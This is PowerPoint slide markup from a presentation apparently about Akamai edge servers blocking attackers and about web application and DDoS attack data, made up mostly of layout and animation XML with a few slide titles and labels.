            <a:ext cx="2728226" cy="188140"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6600CC"/>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43" name="TextBox 42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2429231" y="5797623"/>
            <a:ext cx="1971590"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Forward Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 37" descr="Akamai_Server"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5212504" y="2984746"/>
            <a:ext cx="691" cy="444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1072974" y="2965635"/>
            <a:ext cx="2085629" cy="932090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130599" tIns="65298" rIns="130599" bIns="65298" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0096D6"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Customer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0096D6"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="TextBox 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8639376" y="2861550"/>
            <a:ext cx="2453267" cy="932090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130599" tIns="65298" rIns="130599" bIns="65298" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0096D6"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Akamai</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0096D6"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0096D6"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Edge Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 40" descr="Hacker.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11923587" y="4411492"/>
            <a:ext cx="1880282" cy="1045518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9262799" y="4460745"/>
            <a:ext cx="697593" cy="1015644"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91423" tIns="45711" rIns="91423" bIns="45711" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Left Arrow 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="9488098" y="5444265"/>
            <a:ext cx="2704706" cy="235172"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6600CC"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="130599" tIns="65298" rIns="130599" bIns="65298" numCol="1" rtlCol="0" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="TextBox 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9712619" y="5527663"/>
            <a:ext cx="1971590" cy="932090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130599" tIns="65298" rIns="130599" bIns="65298" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Custom </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Error page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="spedometer 1" descr="Dial_1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect b="25881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941766" y="4016189"/>
            <a:ext cx="2527053" cy="1611880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="spedometer 2" descr="Dial_2.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect b="25594"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941766" y="4016188"/>
            <a:ext cx="2527053" cy="1618130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="spedometer 3" descr="Dial_3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect b="25903"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941766" y="4016189"/>
            <a:ext cx="2527053" cy="1611406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="spedometer 4" descr="Dial_4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect b="25903"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941766" y="4016189"/>
            <a:ext cx="2527053" cy="1611406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="spedometer 5" descr="Dial_5.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect b="25594"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941766" y="4016188"/>
            <a:ext cx="2527053" cy="1618130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3723347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1"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="1"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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="1"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par>
                          <p:cTn id="41" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="42" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="2"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="45" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="2"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="2"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par>
                          <p:cTn id="56" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="57" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="3"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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="60" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="61" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="3"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="64" presetID="10"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par>
                          <p:cTn id="67" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="68" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="4"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="71" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="72" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="4"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="75" presetID="10"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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="78" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="79" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="5"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="81" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="82" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="83" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="5"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="86" presetID="10" presetClass="entr" presetSubtype="0" fill="hold"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par>
                          <p:cTn id="89" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="90" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="92" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" grpId="6" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="94" presetID="1" presetClass="exit" presetSubtype="0" fill="hold" grpId="3"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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="98" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="99" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" grpId="6"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="101" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="102" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="6500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="103" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0"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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="106" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="107" presetID="22" presetClass="entr" presetSubtype="8"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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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0" grpId="3" animBg="1"/>
      <p:bldP spid="30" grpId="4" animBg="1"/>
      <p:bldP spid="30" grpId="5" animBg="1"/>
      <p:bldP spid="30" grpId="6" animBg="1"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="34" grpId="0" animBg="1"/>
      <p:bldP spid="34" grpId="1" animBg="1"/>
      <p:bldP spid="34" grpId="2" animBg="1"/>
      <p:bldP spid="34" grpId="3" animBg="1"/>
      <p:bldP spid="34" grpId="4" animBg="1"/>
      <p:bldP spid="34" grpId="5" animBg="1"/>
      <p:bldP spid="34" grpId="6" animBg="1"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="35" grpId="1"/>
      <p:bldP spid="40" grpId="0" animBg="1"/>
      <p:bldP spid="40" grpId="1" animBg="1"/>
      <p:bldP spid="40" grpId="2" animBg="1"/>
      <p:bldP spid="40" grpId="3" animBg="1"/>
      <p:bldP spid="43" grpId="0"/>
      <p:bldP spid="43" grpId="1"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="47" grpId="0" animBg="1"/>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Note on the Web Application Attack Data Corpus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="548640" indent="-548640">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We do NOT consider Application Security Testing vendors as legitimate threat actors and exclude their traffic from our analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635354" y="3223971"/>
            <a:ext cx="4567936" cy="1491571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5623560" y="3200990"/>
            <a:ext cx="2951683" cy="1537533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4883599" y="5330362"/>
            <a:ext cx="4863203" cy="799430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9077734" y="3424420"/>
            <a:ext cx="2787946" cy="1115179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10786567" y="5066954"/>
            <a:ext cx="1326246" cy="1326246"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="731521" y="5330361"/>
            <a:ext cx="3210021" cy="505130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2732557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Web Application Attack Vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3D73BD-7000-441C-A2FE-CF56D0D14CF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="49045" t="22868" r="15625" b="25452"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568786" y="1432560"/>
            <a:ext cx="7470314" cy="5873466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3238188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49135" y="415821"/>
            <a:ext cx="10114725" cy="7153380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1627221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Distributed Denial of Service (DDOS) Attacks</a:t>
